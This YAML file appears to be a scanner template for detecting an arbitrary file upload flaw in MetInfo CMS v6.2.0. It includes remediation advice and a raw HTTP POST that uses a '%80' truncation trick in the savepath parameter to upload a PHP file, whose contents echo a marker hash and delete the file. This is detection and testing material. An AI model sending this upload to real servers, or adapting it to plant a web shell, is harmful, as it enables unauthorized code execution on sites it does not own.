id: Metinfo-v6_2_0_admin_index_php-UploadGetShell
info:
  name: metinfo v6.2.0 admin/index.php arbitrary file upload getshell.
  author:
  - l0ne1y
  description: |-
    metinfo v6.2.0 admin/index.php arbitrary file upload getshell.
    MetInfo is an open-source, free CMS building system suitable for enterprise websites. The MetInfo enterprise website management system is mainly used to build enterprise websites and uses a PHP+Mysql architecture.

    In MetInfo V6.2.0, the admin_index.php page has an arbitrary file upload vulnerability. An attacker can exploit it to gain server privileges.
  reference:
  - http://www.yulegeyu.com/2019/06/18/metinfo6-arbitrary-file-upload-via-iconv-truncate
  - http://llfam.cn/2019/07/12/metinfo%206.2%20%e4%bb%bb%e6%84%8f%e6%96%87%e4%bb%b6%e4%b8%8a%e4%bc%a0/
  severity: high
  remediation: |-
    Official Fix:<br />1. Upgrade to a non-vulnerable version of the system, or download the security patch from the official site.
    https://www.mituo.cn/

    Temporary Fix:<br />File upload:<br />1. Set the server-side file upload directory to be non-executable.<br />2. File type check: it is recommended to use a whitelist approach (more reliable than a blacklist), combined with MIME type and extension checks (restrict file types via a whitelist). In addition, for images, use compression or resize functions, which break any embedded HTML code while processing the image.<br />3. Rename files and paths using random numbers so users cannot easily access the files they upload.<br />4. Set up a separate domain for the file server.<br />5. Validate file content using regular expressions to match malicious code (filtering various bypass techniques such as case variations and BASE64 encoding) to restrict uploads.<br />6. Fix any parsing vulnerabilities that may exist on the server.<br />7. Strictly restrict uploads of files that can modify server configuration, such as .htaccess.<br />8. Hide uploaded file paths.<br />9. Upgrade the web server.<br />10. Timely fix web upload code.<br />11. There must be no local file inclusion vulnerability.<br />12. Be aware of 0x00 truncation attacks (update PHP to the latest version).
requests:
- matchers:
  - type: dsl
    dsl:
    - status_code==200
  matchers-condition: and
  raw:
  - |
    POST /admin/index.php?m=include&c=uploadify&a=doupfile&savepath=shell.php%80&formname=file&is_rename=0 HTTP/1.1
    Host: {{Host}}
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/test/upload.html
    Content-Type: multipart/form-data; boundary=---------------------------12907703219698305354083698
    Content-Length: 228
    Connection: close
    Upgrade-Insecure-Requests: 1

    -----------------------------12907703219698305354083698
    Content-Disposition: form-data; name="file"; filename="a.jpg"
    Content-Type: image/jpeg

    <?php echo md5(1);unlink(__FILE__);?>

    -----------------------------12907703219698305354083698--
- matchers:
  - type: dsl
    dsl:
    - status_code==200 && contains(body,"c4ca4238a0b923820dcc509a6f75849b")
  path:
  - '{{BaseURL}}/admin/index.php?m=include&c=uploadify&a=doupfile&savepath={{unix_time()}}.php%80&formname=file&is_rename=0'
  method: GET
